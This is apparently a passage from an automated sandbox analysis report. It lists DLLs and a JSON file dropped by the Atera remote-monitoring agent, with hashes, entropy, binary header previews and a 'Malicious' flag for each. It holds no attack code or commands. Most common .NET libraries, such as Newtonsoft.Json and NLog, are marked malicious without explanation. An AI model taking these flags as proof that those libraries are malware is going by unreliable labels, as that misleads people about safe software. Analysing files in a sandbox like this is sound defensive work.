                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):155184
                                                                                                                                                                                                                                        Entropy (8bit):6.247738832262604
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:T0feG0EI+t80zE04kjSnY2QJ6lwZaBsEFmWF+Ykt:IP80zukOltwWk
                                                                                                                                                                                                                                        MD5:CE4E3B687617A7C94D73539DCD89FA73
                                                                                                                                                                                                                                        SHA1:4C6519693D081D9F03503AA5CA3312C41DA3F981
                                                                                                                                                                                                                                        SHA-256:DF753760463622BBF573AD25AC4B5184727D1F232FF68A17A1601F39377DBB76
                                                                                                                                                                                                                                        SHA-512:FA0C76247E05C1577B767373DA659A4876B3B39DA20D3D0CE8A73779306C66FD3A2A032DCD47D11A79F1A1A2A93E242651F8650934CFB98C10D4E50F111F8F90
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%%.W.........." ..0..............M... ...`....... ....................................@.................................lM..O....`...............6..0(..........4L............................................... ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............4..............@..B.................M......H.......d....G...........................................................0...........u....,..s....*.........*Z.(....u-...%-.&*o....*..{....*..{....*..{....*..{....*..{....*2.(....._...*2.(....._...*..{....*2.(....._...*...}......}......}.......}.......}.......}.......}....*>.........}....*..{....*...0...........o].....o^...(....%-.&+..o_....(....,...(....o`.....(....oa....(.......(b...,...(.......(c...od...+"(.......(b...,..(.......(c...od....(.......(e...,...(.......(f...og.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.03083318319815
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:m1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7sV:5Izm6pOIgvr7s
                                                                                                                                                                                                                                        MD5:A58985E020BB24EB28C965043EFBA9F5
                                                                                                                                                                                                                                        SHA1:709CB8780E30484A788EF6EADB8B76D30491F66C
                                                                                                                                                                                                                                        SHA-256:1AAED0562F7379F1998E50A9C0F8CBCFCFEE65FF2EF3C5DE2ACCD56764418385
                                                                                                                                                                                                                                        SHA-512:291CBFB3A468DA06CAA0D02B04CE5109EA3EEBDD1B4B0918D9AE45B7DB9FBEAE6842B35D4C9DF99373CAF54DFBED714577C959BE2C9DD9AA92FE2774860842C8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ..............................HW....`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                        MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                                                        SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                                                        SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                                                        SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:{}

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):354352
                                                                                                                                                                                                                                        Entropy (8bit):6.153514122272104
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:+r/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYy:+hpp9xxIBeXGfvYy
                                                                                                                                                                                                                                        MD5:B2F1B38E6DFFE1FE761A0865392161ED
                                                                                                                                                                                                                                        SHA1:D9196465705125A228494A28D5CE3F3F2C7BDB36
                                                                                                                                                                                                                                        SHA-256:8E958FEA067350A1957FC9E4F3052A1B8D28AB95D4E26A072BCEF0794FB8A398
                                                                                                                                                                                                                                        SHA-512:6E4B6BB945EF698F4552E229E6CBBB615060722D2D1E8F5877200C37C4EEC8AD683C61DA701CB9A09C79673ECA96AC8CAFC3FDF70BACD2C5507C4F0ED78BC1E1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.Y..........." ..0..8..........nW... ...`....... ..............................J.....`..................................W..O....`...............@..0(..........HV..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............>..............@..B................OW......H.......`...ht...................U........................................{*...*..{+...*V.(,.....}*.....}+...*...0..;........u......,/(-....{*....{*...o....,.(/....{+....{+...o0...*.*. S]G. )UU.Z(-....{*...o1...X )UU.Z(/....{+...o2...X*.0...........r...p......%..{*....................-.q.............-.&.+.......o3....%..{+....................-.q.............-.&.+.......o3....(4...*..{5...*..{6...*..{7...*..{8...*..(,.....}5.....}6.....}7......}8...*....0..k........u......,_(-

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071481963565208
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:V1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQU:V1n1p9LdRN39aQZUqF
                                                                                                                                                                                                                                        MD5:CA515F4F34826F5ED5A8FB7D3259FEFF
                                                                                                                                                                                                                                        SHA1:D31158793EBB4E0CBE957158F2E42754CA826A29
                                                                                                                                                                                                                                        SHA-256:5042E33133E0422F51382C273153295DF814E5CC2FF2A4FD0D973B4AF54D4933
                                                                                                                                                                                                                                        SHA-512:1336E658AE6097598F3508424085AD288AF4B60D4FDB821A10BAC712492652F7BB06F3E53556CCBB7425A63ED48B53D368481D1F142E6B58FF7C4789737A3CFF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ..............................n.....`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960477572931558
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:hBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU/:hBA/ZTvQD0XY0AJBSjRlXP36RMGK
                                                                                                                                                                                                                                        MD5:EF06D200D340C9798A006F304119BA82
                                                                                                                                                                                                                                        SHA1:C08B838DAC97CD1376D934FB5ECA982BEB19D493
                                                                                                                                                                                                                                        SHA-256:88C838B4EEDFF929AFDABA2BA808775B1979C5C9BD7AAED36525CB1A41D8A8FD
                                                                                                                                                                                                                                        SHA-512:E67597F90A504A1B7C6AE838C8F82BF9928D49B22E896592623E9473147F8C05B974E86567E40D93D9C59602843A532034ACF5BAD2EAD78962AC2435A63E80A7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... .......K....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):293424
                                                                                                                                                                                                                                        Entropy (8bit):6.121578040837099
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:vdmT7N9hXNx16L/kakZieD2C6gVkRYKn6nUa9K+yt:vdc7N/WkQHr64t
                                                                                                                                                                                                                                        MD5:C329213E3BAAC31E55B7E57C9B5692C1
                                                                                                                                                                                                                                        SHA1:C858EFBB991254A929A0D7BCB1087628501E6DC7
                                                                                                                                                                                                                                        SHA-256:38C66E322E92172722E36001F2C9E6151655CFFDA8D78BA730B1878FAD793FF6
                                                                                                                                                                                                                                        SHA-512:C86F49F789B40E4EEC295CB652CFC63FD5C87E51029AF975AFEFA86C57BB6A9E52DAD54993FB7186ECE73BA905EF43C50E11B85F221EBC59698D8E1845FA90BC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.d.........." ..0..H..........rb... ........... ..............................`.....`................................. b..O.......$............R..0(........................................................... ............... ..H............text....F... ...H.................. ..`.rsrc...$............J..............@..@.reloc...............P..............@..B................Tb......H.......\....V...........................................................0...........(......o......e...%.r...p.s....}......}......}.......}......{......e...%.r...p.s....o....r...po.... ....(.....|....(....-.."....}......{......e...%.r!..p.s....o........(....(....o.....(......(....-...}....*..}....*..{....*..{....*..0..a........{......W..}.....{....,..{.....o.....{.....{......e...%.r!..p.s....o.....{.......(....(....o....*..{....*....0..Z........{......P..}.....{....,..{.....o

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):277040
                                                                                                                                                                                                                                        Entropy (8bit):6.190744437011799
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:qSOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYE:luQlBAMW0BvltxZ6h
                                                                                                                                                                                                                                        MD5:D6F46A4CB8CEB824CD1763B62B8F71A8
                                                                                                                                                                                                                                        SHA1:9FA3A8318D93CBDA86D2843B0783CDF0E7B28D92
                                                                                                                                                                                                                                        SHA-256:66386C99B4BCF568C95E93B11E5E89FC78556924C5BDAC9644BCCA7B04291542
                                                                                                                                                                                                                                        SHA-512:4B720C78E8B3316EAE4FD0BE2499173246AAD3896ED7AF76124A8E565977C27197C73D61474ABA34264F18D5C4BCAF1B51070484CE093814E3CA6C2804AE419F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............'... ...@....... ..............................f.....@..................................&..O....@..L...............0(...`.......%..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................&......H.......L[......................`%......................................^.{....,.(:...z..}.....*^.{....,.(:...z..}.....*"..(?...*"..(@...*...0..,.......sp......}........q...s7...sj....{.....(....*.0..-.......sr......}........s...s7....ss....{.....(....*....0..(.......st......}........u...s7.....{.....(....*.0..'.......sv......}........w...s7...sj.....(....*B...ss.....(....*......(....*.0..'.......sx......}........y...s7...sj.....(....*F...ss......(....*....0..Z..........}....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.117480150640407
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:PZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHNS:Rgo0WPVTXgg
                                                                                                                                                                                                                                        MD5:74DD74986D9708CFA8F4B4F0D005B604
                                                                                                                                                                                                                                        SHA1:55C85D2BD0ACD3E14ADF6D442670BC7F3DBBB803
                                                                                                                                                                                                                                        SHA-256:7100B1A666B0AA99EE5036E23ACC1BA3CFF2E7B2C73A2EA72F5359374648349E
                                                                                                                                                                                                                                        SHA-512:6CA3A9F1D10B4C492ED4902631C38F81001BDF256014148A7628166BF1932BBBC9DDA570A295C99F918818EFBA28C82D1E33C1532A2EA8163027C14351CC4ED3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ...............................0....`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.679229646565206
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:3y/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOqUeaT:3uhMaVmzDC67EpYinAMxCuT
                                                                                                                                                                                                                                        MD5:A4EFAE23A302EE53F0A81FF5B3523292
                                                                                                                                                                                                                                        SHA1:EBB0ADFB9771F4CD61A1D0A9CDFE16CE5621A304
                                                                                                                                                                                                                                        SHA-256:D1D0C53044B2BF85F5B19CAF709BEFFCED51397AE94C37F14EB94E915C6446DE
                                                                                                                                                                                                                                        SHA-512:E77C1CEB40F69342C742AACB07016EA6ED5AFB36949E00E85663EA15996C62E019959FDD44E9E0D468C91DBD89CC8EDE10CCC9F242DB7D6C87D2A6E24E6691FE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ...............................3....@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):409136
                                                                                                                                                                                                                                        Entropy (8bit):6.098144476210718
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:qPaYZ6henFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchFFc5cbc1j:06heZBJm333M89QAy
                                                                                                                                                                                                                                        MD5:D03824AAFFA4923C80E6D8B716D8430E
                                                                                                                                                                                                                                        SHA1:06CE0C7BAFB16D3E92B35444467DB7DE0A6C7C84
                                                                                                                                                                                                                                        SHA-256:7782C0F86CE42101799CA9828FABA1798230734D17990637040DCF15F3617644
                                                                                                                                                                                                                                        SHA-512:59A04EFE8423402F57896ED8D70419ADDF52309024606B35E485E051D21076261098DCBE5F7AA7CE5F8BFC93BE992E94A1AE07102F810B9B1E020529C52475E2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.c...........!.................+... ...@....... ..............................SO....`.................................H+..S....@..p...............0(...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................+......H...........tM..........PM..J...P .......................................6K/.%.L....7.......2.x..`..P.k:k.......0\W.j...;..xX.~..HB..S@.$.m...)4..<S1...C.Y......#ku.k&..2<..i{..>....U...s.'{:.(......}....*..{....*:.(......}....*..{....*r.(......}......}......}....*..0..5........-..*~.....o.....X...v....~.......o......o .........*6..(....(....*"..(....*.0..T........~!...("...-..-.~#...*../....+...X....($...-..-.~#...*..v........(%...~.......o&...*Z.~....2..~.........

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.2347643754291555
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Yzpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWZ:YzpjF0/t043e3vggr83jMYa/hU7HxVZ
                                                                                                                                                                                                                                        MD5:520478C4C71D99D43989786250EB4763
                                                                                                                                                                                                                                        SHA1:748AB4CFCCDB28B46E8226115C88681F72C033FE
                                                                                                                                                                                                                                        SHA-256:9708914775950619C1F13B1871CAA6FA7874891985E249F82AC60862C68746A4
                                                                                                                                                                                                                                        SHA-512:1C851D77617A8059491A1F02F81A27F8AE19CCF6EF925F63301F2C20B190BD35CFD60858121F7BA57301684A4685C87F25089040A67D1EB421A4B82AE8403B03
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.................. ........... ..............................e.....@.................................X...O.......................0(.......... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........J...g..........p...0.............................................{!...*:.(".....}!...*..0..#........u......,.(#....{!....{!...o$...*.*v ..yN )UU.Z(#....{!...o%...X*....0..M........r...p......%..{!....................-.q.............-.&.+.......o&....('...*..{(...*:.(".....}(...*.0..#........u......,.(#....{(....{(...o$...*.*v ..:. )UU.Z(#....{(...o%...X*....0..M........r-..p......%..{(....................-.q.............-.&.+.......o&....('...*..{)...*..{*...*V.("...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.179821808998386
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:+P3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IlY:+h0qjC5RMOHO420kN1j
                                                                                                                                                                                                                                        MD5:684D6E74002F9691D8CBCB135B6717E2
                                                                                                                                                                                                                                        SHA1:9FC0F5E7AF66ACD2BB0316BF28E9CC0201037EE4
                                                                                                                                                                                                                                        SHA-256:B6AD62636F7224EE73ED95D2E14EB089C34D40BFD2BE21A4C9B02D34CF3FA3E3
                                                                                                                                                                                                                                        SHA-512:76710039C919E70A551E7768C230732F71A069DA34B8BDB7B9D2B853FA9001F3D37952A90E47373F53C8D323E9CAF6726F319FEBA632C2E98F5E06716B1C8EDF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`.......M....@.................................3...O.... ..0...............0(...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.673219933457599
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Rh06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBAj3IR:Ry9eEpYinAMxCAcW
                                                                                                                                                                                                                                        MD5:ACFCB0A7B3FD1002A8FCD0FD5D65F734
                                                                                                                                                                                                                                        SHA1:8507B9A8EE31430F75678470F5FA06337A76A5E5
                                                                                                                                                                                                                                        SHA-256:98A4333A188E2E88F115C5F8DDADFBED3924900C1071E3226FA5B16E22FFBCB8
                                                                                                                                                                                                                                        SHA-512:29301D054651817479EDD71E80BA4FB2E3CA449A70D7720017DAA3CF6EA2B1390E56EF763C9C9A97D099A0464439923F48D99AB0EFE2FB8B3308BDFBA7708E9A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ...............................[....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27184
                                                                                                                                                                                                                                        Entropy (8bit):6.334413974319615
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:Sn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCW4:SnvXYcIh6yFIFBYpc47HxN4
                                                                                                                                                                                                                                        MD5:0362AEF9DA024E41795F98D8B888E955
                                                                                                                                                                                                                                        SHA1:53FC9E81D01A7C97D57B9E9ED9A3872EF1E81F74
                                                                                                                                                                                                                                        SHA-256:FC5600A53DD80910B63651E9C5B3B0CA82AA5C53529F4AA0964D21BDC4C64F3A
